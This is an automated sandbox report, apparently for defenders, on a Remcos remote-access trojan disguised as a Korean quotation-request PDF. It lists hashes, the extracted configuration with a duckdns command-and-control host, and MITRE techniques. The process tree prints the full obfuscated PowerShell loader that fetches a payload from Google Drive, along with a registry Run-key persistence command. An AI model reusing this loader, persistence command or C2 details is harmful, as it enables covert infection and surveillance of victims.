remcos | 56c812e915b13daf7330c3e62fba75065fd344c7f5743aa76c557be2abc8ff2e

General

Target

견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs
Size

15KB
MD5

4080a1f28d2e8017fefb06ca6d46b608
SHA1

add65be2539a98c3ce1c2bd82fb9a63a46b9c050
SHA256

1fbf193c059f852718522ab608ebfeaebc3062bc2da2e4450be765f3718b210c
SHA512

4647908cbaeca76c30cba24f1bb985f07b5eade617aafbec26bd74bebff5cf52d4a70b9580b2f182173ae98df5b50324a232cdfc1e4fa86141b57736e46bb381
SSDEEP

384:RBOrNzhAwnWeEzMF7JDSz5nFheEduNsLXiEwnyB+7rH:2ZzhAjemMF7JDSzhFhV20XMyU7rH

Score

10^/10

remcos remotehost discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

5nd42h78s.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-J5NDOL
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 8 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
3	2784	WScript.exe
7	1536	powershell.exe
9	1536	powershell.exe
11	2984	msiexec.exe
13	2984	msiexec.exe
15	2984	msiexec.exe
17	2984	msiexec.exe
18	2984	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Isttes70 = "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\\Software\\fllesfunktions\\').Reportagernes;%Poddidge% ($Cachaemic)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
1536	powershell.exe
2964	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
11	drive.google.com
6	drive.google.com
7	drive.google.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

powershell.exepowershell.exe

pid	Process
1536	powershell.exe
2964	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
2984	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
2964	powershell.exe
2984	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exereg.exepowershell.exemsiexec.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2832	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
1536	powershell.exe
2964	powershell.exe
2964	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid	Process
2964	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1536	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exe

description	pid	Process	procid_target
PID 2784 wrote to memory of 1536	2784	WScript.exe	30
PID 2784 wrote to memory of 1536	2784	WScript.exe	30
PID 2784 wrote to memory of 1536	2784	WScript.exe	30
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2964 wrote to memory of 2984	2964	powershell.exe	35
PID 2984 wrote to memory of 2972	2984	msiexec.exe	37
PID 2984 wrote to memory of 2972	2984	msiexec.exe	37
PID 2984 wrote to memory of 2972	2984	msiexec.exe	37
PID 2984 wrote to memory of 2972	2984	msiexec.exe	37
PID 2972 wrote to memory of 2832	2972	cmd.exe	39
PID 2972 wrote to memory of 2832	2972	cmd.exe	39
PID 2972 wrote to memory of 2832	2972	cmd.exe	39
PID 2972 wrote to memory of 2832	2972	cmd.exe	39

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\견적요청-SNU-RFQ-25-0074_2024-25-11·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Tampers='flappe';;$Sophus189='Bystanders';;$Medalize='Bankfilialer';;$Lnudviklingens160='Statsministres';;$Fonotekernes='Bisonokses';;$fremmedfrerne=$host.Name;function Heksekedelens($Afvaskningens){If ($fremmedfrerne) {$Nonspecious=4} for ($Ambonnay=$Nonspecious;;$Ambonnay+=5){if(!$Afvaskningens[$Ambonnay]) { break }$Zarismes20+=$Afvaskningens[$Ambonnay]}$Zarismes20}function Teutomaniac($Grundvandsbeskyttelser){ .($cyklinger) ($Grundvandsbeskyttelser)}$Hyoglycocholic=Heksekedelens 'N utNBiple P.cTDk.t. utbWAdjuEOoecBAb ncCaeclFo.uIwhipeKalvnTorvt';$Pluskvamperfektummer=Heksekedelens 'InddMembao.ullzRangiEftelSkurlDactagrov/';$Svajryg=Heksekedelens 'LibeTRisalBorgs Co.1 Tv 2';$Unparagraphed='Stru[a soNTov ESkretRoed.CompsS,ene olrArchvFeraI aeCIndoEOffePMis OTettiDa pNS ioT AbdMOc,oaRe rNApolAProgGProteTil.r Cau]Skrf:Skt :U resSkrmEQuadc,arauGerar SchiCapaTLandYSlvgPRemeR RazoParatLodzooathC kndop lyLG or=Lkke$Sedds LymV CodaEminj FreROverYUnc,G';$Pluskvamperfektummer+=Heksekedelens 'C nc5 Udb.fixe0Spil Pall(ProdW etsiSchonfiskdRen o rafwTeorsPlur exxN U iT.ndt U l1Patu0Alfa. Sha0w nn; Das ,ostWDro,iMiljn rsl6Akva4 ,fm;Ophi pegax,van6 Ret4Preh;Aflb Un qrRuflvso g:Miav1Revi3Peas1O lt.Samp0 Sty)Fils Sup G.ngbeMun.cOblik erioTils/Hert2Sml 0De,y1 Amb0 R v0Zara1Soli0Lerd1Char SemiFappli ilbrPalee S rfArkioGrunxKo t/Stav1Vlte3B ir1 Ser. a,a0';$Hjertekardiografsignaler=Heksekedelens 'RustUKeybS Mete TolrTv r-s rfAKa tg atETubuN ertT';$Thionation=Heksekedelens 'EntohBolitDriftSnigp se sPhot: Oms/afsp/Kampd Pr rFlasi UncvFebeeBlge.Fu,ogB,neoPervoByb g fvilChafeOrth.HandcHje oPulvmN za/PalauFermc Sad?,lybeUninxMdeapCypro Mi.rJolltdamm=KirudcatioBeviwAtt nOpialFortobestaSalvdDeho&Femti Me dba,k=Poly1fo lUAlkyS apopSocidnavnI eva8StopR ympM bonw CoabSeksDMolsO PlaxJuli5 a,dgBena6pontCSkisxUnosZ HagsMiraLRetfmSo eu TracSv nqDink_Fl v9 Noto N,kc .as1 andPLnn,W';$Dromometer=Heksekedelens 'Tags>';$cyklinger=Heksekedelens 'Pod iFinaE Corx';$Verdensformats='Stringy';$Hamamelin='\Mundil.Snn';Teutomaniac (Heksekedelens ' Slu$ Frig culLC rao .ahB F cA Locl.edb:StamlBomboBr,nT Al.TEncaeNonar xypiKaryEHornrSans=Casi$ areSmaanUndyVPerd:DiskaE ilpKuldp agD Neda ordtRu mAS nk+ ech$ ImphMariaEssaM Aaba SlamDatae B jLTolviByudn');Teutomaniac (Heksekedelens 'Upsp$ agbgReprl GueO Fejb RkkA icklNiy :Mor.BPlexUSc oR,ncoG ilke iluR ebyED.clS ast= lse$KargtQuadhBaryi resOYel.NCdroAOve.tOvn,iMi tocat NTr.b.SignsMiscPUdmaLTappI OveTF lk(bran$Kvrnd esr BesoCasam SnioTrylM heaEElekt SyzEUd.rRPr i)');Teutomaniac (Heksekedelens $Unparagraphed);$Thionation=$Burgeres[0];$Placative=(Heksekedelens 'Clud$SkrigHa eL WpboPolkBGumlaKravLForg: TuriS otNUnpraLou U.hudsPr dpPar.I arbc gniFr.kOFor.U Ke sBirsnOvere,riesErhvsButy=PresNMeloeRaadw ,il-Omsao dyrb Wi j chiEVi icfor tT ot KrydSUdsmyPl dSst itTreceObermGl s.Cl,a$Pi uHNyheY BudOLesbg acol G.gyTankcFiltoBe,ec dekhFinroStavlLutriShaiC');Teutomaniac ($Placative);Teutomaniac (Heksekedelens '.rle$ oldITrk,n U,iaGardu,ousssatapSe,oi U hcLavei oluoPrivuKulasPe rn HaneEnfes,onnsFinh. E,pHWhifeLa yaBuckdInd eG.llr Kr sCopp[Appa$h,rrH MiljMal,eFor rSoapt TyseCai kSkudaCloardaybdd,reiVe.eo Cynghockr ara ystfFldesPaahiTeksgTigrnArisaOp al Stoe acrShor]Pn e= re $SikkPCro lMakeuIndusSleikTrskvHarpaFilemOktapIcare ponrTabufPhane edlkHa.etUnneust nmSynsmSpdbeSv,nr');$Unpiles=Heksekedelens 'Biog$ConfIRe.inDi.ka r nu.alvsvivapv rki,ylecEmiliKonto HeiuMinasS,ilnQuare,lynsFemesConv. C,iDSandoVil wGramnEmi,lBehoomereaIndsdSensFNatuiRusklOscaeSka ( X,n$ F,eTFlinh Omli AraoHampnDiazaJ lltJumpiXerioCan.nC.yo, ste$ P eGSkareAf,onK ffuVaassS ale OmrsNote)';$Genuses=$Lotterier;Teutomaniac (Heksekedelens 's rv$Ki.dGD,ifLQu kOBaskBU.vaA.ordlSi,u:SlynV SagiChi aunvedTotau LanCCo,ltPods7Spa 7hmor= U o(succTOttaeKnleS dysT Dom-AchrPTurraUdsktAfv H ype ci$acroG SmlePokenCom,UBondS UnveSubasud p)');while (!$Viaduct77) {Teutomaniac (Heksekedelens 'Rhi,$jaymg.ecklMytho Ca.bUnwaaNak lYell: M rCKernaUnsilMyx l Cetidia gAggrrG epaSt spSimuhTow,eEp prA to= Sta$ remDFavoi RouvTempiSidedJagte D srStyreC tys') ;Teutomaniac $Unpiles;Teutomaniac (Heksekedelens 'Ex rsMisdt Ge,AcoxorTag.tReps- onSFundl ProeAnnieEn.eP Uer uan4');Teutomaniac (Heksekedelens 'Skl $Ef,eg emlMarkoSkjtbPultaPhy.LEnkn:delavVa iiDo bALanddJus UKr iC Reft C r7Tari7 dh=Anab(Indtt GeneSkovS UneTCo,s-GoldPKe,yaFor,tH,ndh Vik Penr$GravgSkufECry NEngjuMgfasBl.neG lfs Vas)') ;Teutomaniac (Heksekedelens ' Unb$Unexg rafL.oosOHetzb SpeaHulkLS.or:St spCh liK hrCLa.dC misAs avlNon,i Poilnve,lReguiv lj=Comp$NailgMetal.oraOParaBNo,daBraulaver:Di eFDamkGFr dtP eaeSjleM radA SjiSNoniKop ieBranR Exin eroEPale+Le f+ ici%B,ot$neutb igujonqRPhajGpapeeDereRNaboEForeSUdsp.Elguc RanoSommu TilN ushT') ;$Thionation=$Burgeres[$Piccalilli]}$Ambonnayndtales=302364;$Frough=31066;Teutomaniac (Heksekedelens 'Stup$kursG Rysl xpO ickbDisbAfilkLLdre:railT navA UnpWMesoNHj rINomaNParteL.diSThymsPeni9Chry9 Rnt Stan= ark HamaGTil eEnfoTCo r-VirocBageosin N NottSta ESympNReprt unt Unri$ .ubG one.tudn Ly U Wh s,ndve akts');Teutomaniac (Heksekedelens 'Eksp$Abs,g hialApocoFornbSup aHalvlbill: OttTOveroandrpL.inn hrogHarnltimmeThic Gen=f.lt O er[ForsSscisySitus FortChibe idemTrin.MalaC rivoPramnDdtev BygeGaderWh mtReto]Sca :Degr:SimpF S or U.po P mm KotBAlbaaV idsh.peeUdka6Cirk4R ntS SpitMe orJuleiQuean logKron(Brom$ slaTSundaSlubwcoenn SynitrisnUnwee T hsBulls Fol9Hymn9Coop)');Teutomaniac (Heksekedelens 'Sawl$BleagSkrilFiacoGlambUnjaAHmsklSt t:TeledPataeStngC befR AnsYTetr Ba.n=e do Watc[,isdsMargYSulpS FrstRid EBombM Lu . gi TClaveAra.XNearT Knu. DareSpa N racArc,oCatsDSelaiCoinN ,ydGSynd] F,r: tap: SkuAan,oSVenncPennI TaxI Sam.F lsGFlidecoriTN,nfsIag T,lurr.dioi amenRemoGbesv( A.o$ A.dtVel OChasp SkanHimmgCistlElboePlo )');Teutomaniac (Heksekedelens 'Uun,$PictgJumpLdd iOH wbBMamaAT,anlMono: lndtSprnoResunBelts,emeiBrndlEv,lI ExiTFlabi clecZone= Bla$S.brDF.emE.salcNon r Ns YAut,.TilmSBe luSu rBhelbsC seTSkatr pegiAgernlanigSicl( A t$ D.iAE erM Ornb,odoOKurcNT ibnamazaTr fy Brun PerDMaletIn eAPhosLRke.E St sE il,Q.ad$FejlFeu oR Quio afbUDiagGUdfyh Hnn)');Teutomaniac $tonsilitic;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Isttes70" /t REG_EXPAND_SZ /d "%Poddidge% -windowstyle 1 $Cachaemic=(gp -Path 'HKCU:\Software\fllesfunktions\').Reportagernes;%Poddidge% ($Cachaemic)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f32139f2f9ad65f2cc1a53521128ffe0

SHA1
deaf1f35c194634be6ec69603842e0785ba0ca99

SHA256
514aa3e512c93e2df2beb0b9e6bee833a0cd1bb75c783be8b1123cff2d58ddb2

SHA512
ce993aebb473bc76bedac99d5a14623399c4b72d587bf24352402f72e1b96d0eace967e7e5e5ab56f255b606d78b7e0393783919229efa63c0adfc7ceec2cb0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6F49.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarD04B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXZ5IS06A6LBDF1NW13F.temp

Filesize
7KB

MD5
98726bd01364454aef49fa980978296a

SHA1
46946493e51f6547d1955f036afedfaad0aef98e

SHA256
11ed10e51fefc09edcb0fa5da229061bc312e7ff404e27225513051a684a264c

SHA512
7ef9ae651d1e7b28cf3b2021eeb1d79e36a392d43bd58c23e9a102ddabefa58ed76b10f8571215b21273596d037defe43979d1b512c7d76cb28795788c55936e

Download Submit
C:\Users\Admin\AppData\Roaming\Mundil.Snn

Filesize
434KB

MD5
7babfa1cfd73160aea1c973277be8974

SHA1
39f3d08cc1c21be1ca0bd6c29e9dccbc8509a275

SHA256
0b1bdccf05ad3242eaaf63f1eb4ecf517608251b915b6cbd6ad893426cdb0d39

SHA512
059f894a53baf7516569432d100ceae31182b531a35ae461a960c71333ea08383beedce1cbddecae6ad3af513c3099ad3649cb473a8e1915a9db175a61125c85

Download Submit
memory/1536-22-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/1536-24-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-26-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-27-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-29-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/1536-30-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-32-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-25-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-23-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/1536-21-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/1536-20-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2964-36-0x0000000006700000-0x00000000081F7000-memory.dmp

Filesize
27.0MB

Download
memory/2984-60-0x0000000000590000-0x00000000015F2000-memory.dmp

Filesize
16.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads